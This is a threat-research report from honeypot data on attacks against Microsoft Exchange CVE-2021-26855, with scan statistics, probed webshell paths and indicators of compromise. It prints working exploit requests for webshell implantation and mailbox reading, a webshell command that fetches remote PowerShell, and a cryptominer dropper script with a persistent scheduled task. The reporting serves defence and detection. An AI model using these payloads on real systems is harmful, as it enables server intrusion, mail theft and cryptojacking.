Microsoft Exchange Vulnerability (CVE-2021-26855) Scan Analysis
Share this
CVE-2021-26855

Microsoft Exchange Vulnerability (CVE-2021-26855) Scan Analysis

Genshen Ye, houliuyang

12 min read

Background

On March 2, 2021, Microsoft disclosed a remote code execution vulnerability in Microsoft Exchange server[1]

We customized our Anglerfish honeypot to simulate and deploy Microsoft Exchange honeypot plug-in on March 3, and soon we started to see a large amount of related data, so far, we have already seen attacks attempting to implant Webshell, obtaiin mailbox information, and conducting XMRig based mining activities, we named it Tripleone.

On March 6, 2021, ProjectDiscovery and Microsoft CSS-Exchange project disclosed the vulnerability detection scripts [2][3]

The remote code execution vulnerability exploitation for Microsoft Exchange servers are complex, generally speaking, it takes some time from PoC publication to real exploitation. Due to the possible impact of the vulnerability, this time the attackers move fast.

CVE-2021-26855 Webshell implantation

POST /ecp/j2r3.js HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json; charset=utf-8
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.&a=~1942062522; ASP.NET_SessionId=00782f75-8b35-11eb-af5a-560002fbb132; msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.
msExchLogonMailbox: S-1-5-20
Content-Length: 381

{"properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test1337.aspx"}}, "identity": {"DisplayName": "OAB (Default Web Site)", "__type": "Identity:ECP", "RawIdentity": "7280d03f-194a-4bf3-98a7-076e7728321d"}}

CVE-2021-26855 Obtaining mailbox information

POST //ecp/ssrf.js HTTP/1.1
Host: {target}
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Hello-World
Content-Type: text/xml
Cookie: X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;
Content-Length: 756

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" 
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types" 
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
    <soap:Body>
        <m:GetFolder>
            <m:FolderShape>
                <t:BaseShape>Default</t:BaseShape>
            </m:FolderShape>
            <m:FolderIds>
                <t:DistinguishedFolderId Id="inbox">
                    <t:Mailbox>
                        <t:EmailAddress>admin@domain.tld</t:EmailAddress>
                    </t:Mailbox>
                </t:DistinguishedFolderId>
            </m:FolderIds>
        </m:GetFolder>
    </soap:Body>
</soap:Envelope>

CVE-2021-26855 Mining attack

POST /owa/auth/test1337.aspx HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded

code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B

The attacker used http://178.62.226.184/run.ps1 to implant XMRig mining program, here is the detail

$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinue
if($ProcessActive -eq $null)
{
new-item c:\temp\111 -itemtype directory
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://178.62.226.184/config.json","C:\temp\111\config.json")
$WebClient.DownloadFile("http://178.62.226.184/javacpl.exe","C:\temp\111\javacpl.exe")
$WebClient.DownloadFile("http://178.62.226.184/WinRing0x64.sys","C:\temp\111\WinRing0x64.sys")
Start-Process -Filepath "C:\temp\111\javacpl.exe"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString('http://178.62.226.184/run.ps1')"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"
  
}
else
{	
Write-host "run"
}

Anglerfish Honeypot Data

From March 6, 2021, our Anglerfish honeypot system started to see Microsoft Exchange vulnerability (CVE-2021-26855) scans, as of a few days ago, the geographical distribution of the source IP address of the scan is as follows.

Most scans target port 443 (77.3%), followed by port 80 (11.3%), as follows.

The scan source IP ASNs (Autonomous System Numbers) are mainly from Linode, LLC, DiGiTALOCEAN-ASN and LeaseWeb Netherlands B.V., accounting for more than 50%, and the overall trend of the scan is as follows.

The scanned sources are from various countries around the world, with the United States accounting for the largest share, as shown below:

We can see from our data that the Top 5 scanner IPs account for 50% of all scanning behavior, with 159.89.95.163 leading the pack of 24%.

It appears that the attacker had been able to successfully exploit the vulnerability to implant Webshell, as shown in the following figure.

The attacker further implemented malicious attack operations through Webshell, such as implanting XMRig mining program, as shown in the following figure.

Part of the scan source IP rDNS SLD information

Here is a briefly analyzing of the rDNS information corresponding to the scan source IPs.

Webshell Analysis

We monitored a large number of Webshell path probing requests, we believe most of which were scans from security vendors and research organizations.
Known Webshell paths are shown below.

GET /aspnet_client/system_web/log.aspx 	1682
GET /aspnet_client/OutlookEN.aspx 	1660
GET /aspnet_client/HttpProxy.aspx 	1643
GET /aspnet_client/aspnet_client.aspx 	1613
GET /aspnet_client/discover.aspx 	1583
GET /aspnet_client/supp0rt.aspx 	1490
GET /owa/auth/OutlookEN.aspx 	1464
GET /aspnet_client/aspnet_iisstart.aspx 	1463
GET /owa/auth/Current/scripts/premium/fexppw.aspx 	1442
GET /aspnet_client/xclkmcfldfi948398430fdjkfdkj.aspx 	1441
GET /aspnet_client/Server.aspx 	1433
GET /owa/auth/8Lw7tAhF9i1pJnRo.aspx 	1428
GET /owa/auth/logg.aspx 	1416
GET /aspnet_client/xx.aspx 	1412
GET /owa/auth/a.aspx 	1403
GET /owa/auth/Current/themes/errorFS.aspx 	1393
GET /owa/auth/errorPage.aspx 	1373
GET /owa/auth/getpp.aspx 	1367
GET /aspnet_client/aspnet_pages.aspx 	1364
GET /owa/auth/default.aspx 	1334
GET /owa/auth/fatal-erro.aspx 	1326
GET /owa/auth/errorPages.aspx 	1322
GET /owa/auth/log.aspx 	1311
GET /owa/auth/shel90.aspx 	1306
GET /owa/auth/Err0r.aspx 	1303
GET /owa/auth/logout.aspx 	1302
GET /aspnet_client/log3.aspx 	1293
GET /owa/auth/15.0.1347/themes/resources/exchange_create_css.aspx 	1285
GET /owa/auth/RedirSuiteServerProxy.aspx 	1279
GET /aspnet_client/eror.aspx 	1266
GET /aspnet_client/0QWYSEXe.aspx 	1263
GET /owa/auth/current/one1.aspx 	1260
GET /aspnet_client/session.aspx 	1242
GET /aspnet_client/iispage.aspx 	1213
GET /aspnet_client/system_web/logx2.aspx 	1212
GET /owa/auth/Current/themes/resources/owafont_vo.aspx 	1207
GET /aspnet_client/log.aspx 	1207
GET /aspnet_client/WlUtyY.aspx 	1168
GET /aspnet_client/aspnet_www.aspx 	1167
GET /owa/auth/15.0.847/themes/resources/hmask.aspx 	1164
GET /owa/auth/Current/app222.aspx 	1155
GET /owa/auth/15.1.1913/themes/resources/View_Photos.aspx 	1147
GET /owa/auth/ErrorAA.aspx 	1089
GET /owa/auth/one.aspx 	1079
GET /aspnet_client/errorcheck.aspx 	1074
GET /owa/auth/one1.aspx 	1072
GET /aspnet_client/system_web/logfe.aspx 	1064
GET /owa/auth/zntwv.aspx 	1031
GET /owa/auth/Current/themes/resources/owafont_vn.aspx 	1019
GET /owa/auth/shel.aspx 	1016
GET /owa/auth/shel2.aspx 	1011
GET /owa/auth/bob.aspx 	1008
GET /owa/auth/OutlookZH.aspx 	1008
GET /owa/auth/Current/themes/resources/daxlz.aspx 	1001
GET /owa/auth/authhead.aspx 	1000
GET /owa/auth/15.1.1913/themes/resources/bg_gradient_login.aspx 	993
GET /aspnet_client/default1.aspx 	984
GET /aspnet_client/system_web/logon.aspx 	978
GET /aspnet_client/s.aspx 	930
GET /aspnet_client/RedirSuiteServerProxy.aspx 	927
GET /aspnet_client/8aUco9ZK.aspx 	920
GET /aspnet_client/F48zhi6U.aspx 	917
GET /aspnet_client/E3MsTjP8.aspx 	915
GET /aspnet_client/Fc1b3WDP.aspx 	915
GET /aspnet_client/2XJHwN19.aspx 	907
GET /aspnet_client/0q1iS7mn.aspx 	905
GET /aspnet_client/shell.aspx 	901
GET /aspnet_client/McYhCzdb.aspx 	898
GET /aspnet_client/sol.aspx 	893
GET /aspnet_client/aspnettest.aspx 	889
GET /aspnet_client/error_page.aspx 	885
GET /aspnet_client/system_web/error.aspx 	883
GET /aspnet_client/UwSPMsFi.aspx 	882
GET /aspnet_client/web.config.aspx 	878
GET /aspnet_client/shellex.aspx 	876
GET /aspnet_client/uHSPTWMG.aspx 	873
GET /aspnet_client/help.aspx 	868
GET /aspnet_client/load.aspx 	865
GET /aspnet_client/zXkZu6bn.aspx 	858
GET /aspnet_client/ogu7zFil.aspx 	843
GET /owa/auth/shell.aspx 	644
GET /owa/auth/web.aspx 	643
GET /owa/auth/aspnet_client.aspx 	639
GET /owa/auth/errorEEE.aspx 	635
GET /owa/auth/27fib.aspx 	627
GET /owa/auth/errorEE.aspx 	625
GET /owa/auth/b.aspx 	624
GET /owa/auth/aspnettest.aspx 	621
GET /owa/auth/healthcheck.aspx 	621
GET /owa/auth/t.aspx 	620
GET /owa/auth/shellex.aspx 	619
GET /owa/auth/wanlin.aspx 	619
GET /owa/auth/aspnet_iisstart.aspx 	619
GET /owa/auth/errorFF.aspx 	615
GET /owa/auth/test.aspx 	615
GET /owa/auth/document.aspx 	614
GET /owa/auth/xx.aspx 	613
GET /owa/auth/help.aspx 	612
GET /owa/auth/evilcorp.aspx 	611
GET /owa/auth/web.config.aspx 	606
GET /owa/auth/error_page.aspx 	605
GET /owa/auth/aspnet_www.aspx 	603
GET /owa/auth/errorFE.aspx 	601
GET /owa/auth/errorEW.aspx 	597
GET /owa/auth/OutlookDA.aspx 	288
GET /owa/auth/OutlookFR.aspx 	208
GET /owa/auth/OutlookIT.aspx 	187
GET /owa/auth/OutlookDE.aspx 	186
GET /owa/auth/OutlookES.aspx 	182
GET /owa/auth/expiredpassword.aspx 	175
GET /owa/auth/OutlookPL.aspx 	171
GET /owa/auth/OutlookAR.aspx 	165
GET /owa/auth/OutlookSE.aspx 	162
GET /owa/auth/logoff.aspx 	150
GET /owa/auth/OutlookAS.aspx 	146
GET /owa/auth/OutlookIO.aspx 	144
GET /owa/auth/OutlookCN.aspx 	111
GET /aspnet_client/Service.aspx 	88
GET /aspnet_client/1d.aspx 	88
GET /aspnet_client/Metabase.aspx 	86
GET /aspnet_client/7KmCS.aspx 	86
GET /aspnet_client/config.aspx 	79
GET /aspnet_client/cafZCu.aspx 	78
GET /aspnet_client/8lw7tahf9i1pjnro.aspx 	77
GET /aspnet_client/MAlREnavuY.aspx 	77
GET /aspnet_client/a.aspx 	77
GET /aspnet_client/Default.aspx 	76
GET /aspnet_client/ahihi.aspx 	76
GET /aspnet_client/aa.aspx 	76
GET /aspnet_client/aspnet_iistart.aspx 	75
GET /aspnet_client/configs.aspx 	74
GET /aspnet_client/aspnet.aspx 	71
GET /aspnet_client/aspx_client.aspx 	69
GET /aspnet_client/error404.aspx 	67
GET /aspnet_client/bob.aspx 	67
GET /aspnet_client/document.aspx 	67
GET /aspnet_client/authhead.aspx 	67
GET /aspnet_client/current/one1.aspx 	63
GET /aspnet_client/client.aspx 	63
GET /aspnet_client/erroree.aspx 	63
GET /owa/auth/seclogon.aspx 	61
GET /aspnet_client/upnews.aspx 	60
GET /aspnet_client/errorff.aspx 	60
GET /owa/auth/Current/themes/resources/system_io.aspx 	60
GET /owa/auth/15.1.225/scripts/premium/errorPE.aspx 	59
GET /aspnet_client/y3iGH.aspx 	59
GET /owa/auth/Current/themes/resources/errorFE.aspx 	59
GET /owa/auth/Current/AMNBJLXqoHTV.aspx 	59
GET /aspnet_client/errorew.aspx 	59
GET /owa/auth/Current/themes/resources/OutlookQN.aspx 	59
GET /owa/auth/Current/themes/resources/View_tools.aspx 	59
GET /owa/auth/6GIXZG.aspx 	59
GET /aspnet_client/system_web/ogzsis0L.aspx 	59
GET /owa/auth/Current/themes/resources/Ignrop.aspx 	59
GET /aspnet_client/errorpages.aspx 	58
GET /aspnet_client/erroreee.aspx 	58
GET /owa/auth/hmknq.aspx 	57
GET /aspnet_client/system_web/4_0_30319/self.aspx 	57
GET /owa/auth/DesktopShellExt.aspx 	57
GET /aspnet_client/web.aspx 	56
GET /aspnet_client/system_web/9VkFwtxt.aspx 	56
GET /aspnet_client/default.aspx 	56
GET /aspnet_client/soHKY.aspx 	56
GET /aspnet_client/errorpage.aspx 	56
GET /owa/auth/rlvgk.aspx 	54
GET /owa/auth/logerr.aspx 	54
GET /owa/auth/pzbwl.aspx 	54
GET /owa/auth/owaauth.aspx 	54
GET /aspnet_client/est11.aspx 	54
GET /owa/auth/errorcheck.aspx 	53
GET /owa/auth/Current/layout.aspx 	52
GET /owa/auth/Current/themes/resources/logon.aspx 	52
GET /owa/auth/CommonError.aspx 	52
GET /owa/auth/Current/themes/config1.aspx 	52
GET /owa/auth/ErrorDef.aspx 	52
GET /owa/auth/iasads.aspx 	51
GET /owa/auth/15.1.2044/themes/resources/office365_ph.aspx 	51
GET /owa/auth/061a06908b.aspx 	50
GET /owa/auth/Current/zJBxcBoI.aspx 	50
GET /owa/auth/errorew.aspx 	50
GET /aspnet_client/help..aspx 	50
GET /owa/auth/15.0.1497/themes/resources/error.aspx 	50
GET /owa/auth/rwinsta.aspx 	50
GET /aspnet_client/t.aspx 	50
GET /owa/auth/server.aspx 	49
GET /owa/auth/erroreww.aspx 	49
GET /aspnet_client/temp.aspx 	49
GET /owa/auth/frow.aspx 	49
GET /aspnet_client/test007.aspx 	49
GET /owa/auth/fhsvc.aspx 	49
GET /owa/auth/s.aspx 	48
GET /owa/auth/errorpage.aspx 	48
GET /aspnet_client/zEeomtdYcX.aspx 	48
GET /owa/auth/session.aspx 	48
GET /owa/auth/secauth.aspx 	48
GET /owa/auth/Current/Exchanges.aspx 	48
GET /owa/auth/erroree.aspx 	48
GET /owa/auth/atlthunk.aspx 	48
GET /aspnet_client/voqbETdoni.aspx 	48
GET /owa/auth/secauth1.aspx 	48
GET /owa/auth/online.aspx 	48
GET /owa/auth/erroreee.aspx 	48
GET /owa/auth/outlooken.aspx 	48
GET /owa/auth/error.aspx 	47
GET /owa/auth/ProximityService.aspx 	47
GET /owa/auth/outlookfront.aspx 	47
GET /owa/auth/proxylogon.aspx 	47
GET /owa/auth/8lw7tahf9i1pjnro.aspx 	47
GET /owa/auth/ovfwHWjwWm.aspx 	47
GET /owa/auth/qnx.aspx 	47
GET /owa/auth/plorion.aspx 	47
GET /aspnet_client/uyqITYBPew.aspx 	47
GET /owa/auth/outlookru.aspx 	47
GET /aspnet_client/show.aspx 	47
GET /aspnet_client/fatal-erro.aspx 	46
GET /owa/auth/errorfff.aspx 	46
GET /owa/auth/KBDBENE.aspx 	46
GET /owa/auth/OutlookUS.aspx 	46
GET /aspnet_client/system.aspx 	46
GET /owa/auth/login.aspx 	46
GET /owa/auth/letmeinplzs.aspx 	46
GET /owa/auth/jhJ2zT9ouOfP6VnBcHg3.aspx 	46
GET /owa/auth/errorff.aspx 	46
GET /owa/auth/redirsuiteserverproxy.aspx 	45
GET /aspnet_client/signon.aspx 	45
GET /aspnet_client/healthcheck.aspx 	45
GET /aspnet_client/login.aspx 	45
GET /owa/auth/ntprint.aspx 	45
GET /owa/auth/m0xbqRg1ranzvGD3jiXT.aspx 	44
GET /aspnet_client/qfmrucnzl.aspx 	44
GET /owa/auth/errorpages.aspx 	44
GET /owa/auth/XblGameSave.aspx 	44
GET /owa/auth/OutlookDN.aspx 	44
GET /aspnet_client/obq.aspx 	44
GET /owa/auth/load.aspx 	44
GET /aspnet_client/logaaa.aspx 	44
GET /owa/auth/discover.aspx 	43
GET /owa/auth/outlookjp.aspx 	43
GET /owa/auth/jOBJIfr92ERLmg1HcnF3.aspx 	43
GET /owa/auth/hUjwpeROcY7Fo4g8ETH3.aspx 	42
GET /aspnet_client/shel90.aspx 	42
GET /aspnet_client/support.aspx 	42
GET /owa/auth/HcDKNzBoha.aspx 	41
GET /owa/auth/multiup.aspx 	41
GET /owa/auth/FR5Ha0D1dwfsqIUMhLCQ.aspx 	40
GET /owa/auth/outlookzh.aspx 	40
GET /owa/auth/HUUPItrNpXvI.aspx 	40
GET /owa/auth/dbuj9.aspx 	40
GET /owa/auth/xclkmcfldfi948398430fdjkfdkj.aspx 	40
GET /owa/auth/L2oXwTljs3GnMyHQV0KR.aspx 	39
GET /owa/auth/sol.aspx 	39
GET /owa/auth/httpproxy.aspx 	39
GET /owa/auth/XboxNetApiSvc.aspx 	39
GET /owa/auth/supp0rt.aspx 	39
GET /aspnet_client/one.aspx 	39
GET /owa/auth/signon.aspx 	38
GET /aspnet_client/outlookjp.aspx 	38
GET /owa/auth/OutlookEN.US.aspx 	38
GET /owa/auth/KrhHyDPwb70ct362JmLn.aspx 	38
GET /owa/auth/OutlookUN.aspx 	37
GET /owa/auth/aa.aspx 	36
GET /owa/auth/aaa.aspx 	36
GET /owa/auth/iispage.aspx 	36
GET /aspnet_client/redirsuiteserverproxy.aspx 	36
GET /owa/auth/shelltest.aspx 	35
GET /owa/auth/system_web/log.aspx 	35
GET /owa/auth/aspx_client.aspx 	35
GET /owa/auth/tst1.aspx 	35
GET /owa/auth/tpmvscmgrsvr.aspx 	35
GET /aspnet_client/online.aspx 	34
GET /owa/auth/VqEUaLjKpcWoNC7yPMlz.aspx 	34
GET /owa/auth/aspnet.aspx 	34
GET /aspnet_client/outlookru.aspx 	34
GET /aspnet_client/outlookzh.aspx 	34
GET /aspnet_client/outlookfront.aspx 	34
GET /aspnet_client/shel.aspx 	33
GET /aspnet_client/logg.aspx 	33
GET /owa/auth/asas.aspx 	33
GET /aspnet_client/server.aspx 	33
GET /owa/auth/tNLPge.aspx 	32
GET /owa/auth/ahihi.aspx 	32
GET /owa/auth/TimeoutLogout.aspx 	32
GET /owa/auth/aspnet_pages.aspx 	32
GET /owa/auth/ZI3uMczmPa5bwTYVpKsE.aspx 	32
GET /owa/auth/test13037.aspx 	31
GET /aspnet_client/shel2.aspx 	31
GET /aspnet_client/one1.aspx 	31
GET /aspnet_client/httpproxy.aspx 	31
GET /owa/auth/test1337.aspx 	31
GET /owa/auth/signout.aspx 	29
GET /aspnet_client/outlooken.aspx 	28
GET /owa/auth/default1.aspx 	28
GET /owa/auth/theme-gsx8ujzpicf0.aspx 	28
GET /aspnet_client/multiup.aspx 	27
GET /aspnet_client/logout.aspx 	27
GET /owa/auth/theme-vten8snn874b.aspx 	25
GET /aspnet_client/error.aspx 	8
GET /aspnet_client/errorFF.aspx 	8
GET /aspnet_client/errorEE.aspx 	8
GET /owa/auth/OutlookJP.aspx 	6
GET /aspnet_client/errorEW.aspx 	6
POST /aspnet_client/discover.aspx 	5
GET /aspnet_client/errorEEE.aspx 	5
POST /aspnet_client/system_web/logx2.aspx 	4
GET /owa/auth/HttpProxy.aspx 	4
GET /owa/auth/OutlookRU.aspx 	4
GET /aspnet_client/system_web/sol.aspx 	4
GET /aspnet_client/system_web/QBFjM1SC.aspx 	4
GET /aspnet_client/OutlookJP.aspx 	4
GET /aspnet_client/system_web/ioWYM7C4.aspx 	4
GET /owa/auth/Online.aspx 	4
GET /aspnet_client/MultiUp.aspx 	4
GET /owa/auth/Logout.aspx 	4
GET /aspnet_client/system_web/E12B65rm.aspx 	4
GET /aspnet_client/system_web/vY4qLEpG.aspx 	3
GET /aspnet_client/system_web/test.aspx 	3
GET /aspnet_client/Online.aspx 	3
GET /aspnet_client/system_web/3ue5myCq.aspx 	3
GET /aspnet_client/system_web/sJ0f8qHt.aspx 	3
GET /aspnet_client/system_web/cMvBgHLZ.aspx 	3
GET /aspnet_client/system_web/WFk2or3Y.aspx 	3
GET /aspnet_client/system_web/GnCwADKH.aspx 	3
GET /aspnet_client/rabiitch.aspx 	3
GET /aspnet_client/system_web/Cs64LbPk.aspx 	3
GET /aspnet_client/Logout.aspx 	2
GET /owa/auth/WMSPDMOD.aspx 	2
GET /aspnet_client/OutlookRU.aspx 	2
GET /owa/auth/Discover.aspx 	2
GET /aspnet_client/system_web/2TFGNswO.aspx 	2
GET /aspnet_client/Discover.aspx 	2
GET /owa/auth/checkerror635284.aspx 	2
GET /owa/auth/MultiUp.aspx 	2
GET /aspnet_client/system_web/3NHhPxJ5.aspx 	2
GET /aspnet_client/system_web/1A2ZeQOu.aspx 	2
GET /owa/auth/Current/themes/resources/lgnleft.aspx 	2
GET /aspnet_client/checkerror635284.aspx 	2
GET /owa/auth/1d61acae91.aspx 	2
GET /owa/auth/current/themes/resources/error.aspx 	1
GET /aspnet_client/iisstart.aspx 	1
GET /owa/auth/lo.aspx 	1
GET /owa/auth/error404.aspx 	1

Miscrosoft Exchange server distribution

360 Quake cyberspace mapping system found a total of 3,378,260 data records for Microsoft Exchange servers by mapping assets across the network, including 534,590 independent IPs, as shown in the following figure.

Contact us

Readers are always welcomed to reach us on twitter, or email to netlab at 360
dot cn.

IoC

IP:

178.62.226.184
157.245.47.214

Miner Proxy:

159.65.206.137:3333

URL:

http://178.62.226.184/mini-reverse.ps1 
http://178.62.226.184/run.ps1
http://178.62.226.184/config.json
http://178.62.226.184/javacpl.exe
http://178.62.226.184/WinRing0x64.sys

MD5:

79e2c9953f452f777d55749f01e5f3b7
2d4d75e46f6de65fba2451da71686322
0fe28f557e9997cd2750ff3fa86a659e
67f2d42e30f6239114feafc9ffd009d8
0c0195c48b6b8582fa6f6373032118da